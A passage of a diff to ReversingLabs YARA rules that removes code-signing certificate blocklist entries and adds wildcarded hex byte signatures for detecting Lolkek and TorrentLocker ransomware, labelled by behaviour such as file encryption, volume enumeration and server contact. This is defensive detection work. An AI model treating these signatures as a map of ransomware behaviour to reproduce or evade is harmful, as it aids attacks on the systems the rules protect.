8B 45 ?? 8B 08 FF 51 ?? 8D 55 ?? 8B 45 ?? 8B 08 FF 51 ?? 8B 45 ?? 8D 55 + ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? E8 ?? ?? + ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B C3 8B 55 ?? E8 ?? ?? ?? ?? + 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 + } + $encrypt_files = { + 55 8B EC 6A ?? 6A ?? 6A ?? 53 56 57 BB ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 + 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 + ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 10 FF 52 + ?? 8B F0 8B C3 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 + ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D + 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 + ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 + ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 + ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 + ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 + ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 + ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 + ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 + ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B DE 4B 85 DB 7C ?? 43 33 F6 8D 55 ?? 33 C0 E8 ?? ?? ?? ?? 8B 45 + ?? 8D 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? + ?? ?? 8B 08 FF 51 ?? 8D 4D ?? 8B D6 A1 ?? ?? ?? ?? 8B 38 FF 57 ?? 8B 45 ?? B1 ?? BA + ?? ?? ?? ?? E8 ?? ?? ?? ?? 46 4B 75 ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A ?? E8 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CENTR MBP LLC" and pe.signatures[i].serial=="54:0c:ea:63:9d:5d:48:66:9b:7f:2f:64" and 1570871755<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $search_files and $encrypt_files and $remote_connection } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_03A7748A4355020A652466B5E02E07De : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Lolkek : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Lolkek ransomware." author = "ReversingLabs" - id = "10134543-04fa-5a2f-8f77-98444ad1d7f0" - date = "2023-11-08" - modified = "2023-11-08" + id = "441badd6-3708-5f74-90f3-4d3a0fc45aff" + date = "2020-10-23" + modified = "2020-10-23" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3790-L3806" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6dc6d0fd2b702939847981ff31c2d8103227ccd0c19f999849ff89c64a90f92f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Lolkek.yara#L1-L106" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d18545b25a33bba1a6e01ab37768bd4f15fb125dcb8cbe7909d9a8bbe08e63fa" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Lolkek" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files = { + 57 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? + ?? ?? ?? B9 ?? ?? ?? ?? FF 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 3C 85 ?? ?? ?? ?? 40 99 + F7 F9 89 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 8B CF E8 ?? ?? ?? ?? 85 C0 74 + ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8B F0 68 ?? ?? ?? ?? 56 FF D3 83 + C4 ?? 56 57 FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? + 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? + ?? ?? B9 ?? ?? ?? ?? FF 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 3C 85 ?? ?? ?? ?? 40 99 F7 + F9 89 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? 85 FF 0F 85 ?? ?? ?? ?? 5E 5B 33 C0 5F C2 + } + $find_volumes_p1 = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 + 57 E8 ?? ?? ?? ?? 6A ?? 8D 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 6A ?? 50 C7 44 + 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? + ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 + 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? + ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? + ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 + 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? + ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 + ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? + ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 83 C4 ?? 89 74 24 ?? 33 + } + $find_volumes_p2 = { + FF 8B 5C BC ?? 53 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 89 9C B4 ?? ?? ?? ?? 46 47 83 FF + ?? 7C ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 68 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 57 FF 15 ?? + ?? ?? ?? 8B D8 0F 1F 00 85 F6 74 ?? 8D 44 24 ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 57 + FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 + ?? 4E 57 FF B4 B4 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? + ?? 85 C0 75 ?? 53 FF 15 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? + ?? ?? 83 C4 ?? 8B 3D ?? ?? ?? ?? 33 F6 8B 1D ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF + D7 33 D2 B9 ?? ?? ?? ?? F7 F1 68 ?? ?? ?? ?? 80 C2 ?? 88 94 34 ?? ?? ?? ?? FF D3 46 + 83 FE ?? 7C ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 FF 15 + } + $find_files_p1 = { + 8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41 + F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F C9 C3 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? + ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? + FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? + 8B CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? + 8B 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B EB ?? 33 FF 57 57 + 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 + 45 ?? 8B 4D ?? 8B 55 ?? 53 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 + ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? + ?? ?? 8A 01 88 85 ?? ?? ?? ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 + ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? + 3C ?? 8A C3 75 ?? B0 ?? 2B CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D + } + $find_files_p2 = { + 56 1B C0 89 9D ?? ?? ?? ?? 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? + ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 + ?? 8D 8D ?? ?? ?? ?? F7 D8 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? + ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B + D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D + ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? + 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 + ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? + 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? + ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? + ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? + ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 + C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 + ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + 59 8B D8 56 FF 15 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 59 8B C3 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Teleneras MB" and pe.signatures[i].serial=="03:a7:74:8a:43:55:02:0a:65:24:66:b5:e0:2e:07:de" and 1575244801<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_volumes_p*)) and ( all of ($find_files_p*)) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_B881A72D4117Bbc38B81D3C65C792C1A : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Torrentlocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects TorrentLocker ransomware." author = "ReversingLabs" - id = "593c1799-a5df-5b3e-8a8b-826d808a14f0" - date = "2023-11-08" - modified = "2023-11-08" + id = "64bdb0db-ea0c-5a0d-9d3e-db1df86c132b" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3808-L3826" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bad2a06090f077ebc635d21446b47c9f115fe477567afb3d5994043f5a7883b1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.TorrentLocker.yara#L1-L98" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f1aa523fa95e142b7e421286d26918e3da4bd3e268fef3f98f00820296291bfc" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "TorrentLocker" + tc_detection_factor = 5 importance = 25 + strings: + $tlocker_ep = { + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 05 E8 ?? ?? ?? ?? 33 C0 C3 + } + $tlocker_contact_server_1 = { + 55 8B EC 83 EC ?? 8D 45 ?? 50 8D 4D ?? 51 B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 21 83 7D + ?? ?? 8B 45 ?? 75 05 8B 10 89 55 ?? 85 C0 74 0F 50 A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 53 56 57 8D 9B ?? ?? ?? ?? + 8B 4D ?? 8D 55 ?? 52 6A ?? BB ?? ?? ?? ?? 89 4D ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 75 ?? 85 F6 0F 84 2C 01 00 00 8B BE + ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 EB 00 00 00 6A ?? 68 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 89 00 00 00 8D 45 ?? 50 8D + 4D ?? 51 6A ?? 56 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 16 81 4D ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 6A ?? 56 FF + 15 ?? ?? ?? ?? 8B 45 ?? 57 50 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 38 6A ?? 8D 4D ?? 51 8D 55 ?? 52 68 ?? ?? ?? ?? + 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 10 81 7D ?? ?? ?? ?? ?? 75 07 C7 45 ?? ?? ?? ?? + ?? 8B 3D ?? ?? ?? ?? 56 FF D7 EB 06 8B 3D ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? 53 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? 53 8B F0 FF D7 85 F6 74 06 8B 55 ?? 52 FF D7 8B 75 ?? 8B 0D ?? ?? ?? ?? 33 C0 83 7D ?? ?? 56 + 0F 94 C0 6A ?? 51 8B F8 FF 15 ?? ?? ?? ?? 85 FF 75 10 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 9E FE FF FF 5F 5E 5B 8B E5 5D + C3 + } + $tlocker_contact_server_2_1 = { + 55 8B EC 83 EC ?? 8D 45 ?? 50 8D 4D ?? 51 B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 21 83 7D + ?? ?? 8B 45 ?? 75 05 8B 10 89 55 ?? 85 C0 74 0F 50 A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 53 56 57 8D 9B ?? ?? ?? ?? + 8B 4D ?? 8D 55 ?? 52 6A ?? BF ?? ?? ?? ?? 89 4D ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 75 ?? 85 F6 0F 84 E5 01 00 00 BF ?? + ?? ?? ?? 39 3D ?? ?? ?? ?? 74 11 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B + 9E ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 EB 00 00 00 6A ?? 68 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 89 00 00 00 8D 45 ?? 50 + 8D 4D ?? 51 6A ?? 56 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 16 81 4D ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 6A ?? 56 + FF 15 ?? ?? ?? ?? 8B 45 ?? 53 50 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 38 6A ?? 8D 4D ?? 51 8D 55 ?? 52 68 ?? ?? ?? + ?? 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 10 81 7D ?? ?? ?? ?? ?? 75 07 C7 45 ?? ?? ?? + ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 EB 06 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? + } + $tlocker_contact_server_2_2 = { + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 57 8B D8 FF D6 85 DB 74 06 8B 55 ?? 52 FF D6 8B 75 ?? 33 C0 83 7D ?? ?? 0F 94 C0 8B F8 85 + FF 74 18 8B 0D ?? ?? ?? ?? 89 0D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? EB 5E 8B 15 ?? ?? ?? ?? 3B 15 ?? ?? ?? ?? 75 + 34 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B D1 41 89 0D ?? ?? ?? ?? 85 D2 7E 71 8B 0D ?? ?? ?? ?? 3B C1 73 08 8B C8 89 0D + ?? ?? ?? ?? 2B C1 3D ?? ?? ?? ?? 72 1C A1 ?? ?? ?? ?? 40 83 F8 ?? 7E 05 A1 ?? ?? ?? ?? 8B C8 A3 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 81 3D ?? ?? ?? ?? ?? ?? ?? ?? 75 0B 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 56 6A ?? 50 FF 15 ?? ?? ?? ?? 85 + FF 75 17 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 E5 FD FF FF A3 ?? ?? ?? ?? EB BF 5F 5E 5B 8B E5 5D C3 + } + $tlocker_get_server_data = { + 55 8B EC 83 EC ?? 56 57 33 FF 57 57 8D 45 ?? 50 53 33 F6 FF 15 ?? ?? ?? ?? 85 C0 74 77 8D 49 ?? 8B 4D ?? 03 CF 85 F6 75 + 73 33 C0 85 C9 74 0F 8B 15 ?? ?? ?? ?? 51 50 52 FF 15 ?? ?? ?? ?? 33 C9 85 C0 0F 95 C1 8B F0 8B C1 85 C0 74 33 8B 55 ?? + 8D 4D ?? 51 52 8D 04 37 50 53 FF 15 